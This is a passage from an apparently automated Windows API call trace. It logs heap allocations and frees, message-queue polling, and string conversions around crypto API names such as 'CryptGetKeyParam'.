0x9bd648 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0172.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.834] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0172.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0172.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0172.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd360 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.835] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.835] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0172.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0172.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.836] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0172.837] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0172.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.838] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0172.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.842] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0172.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0172.842] 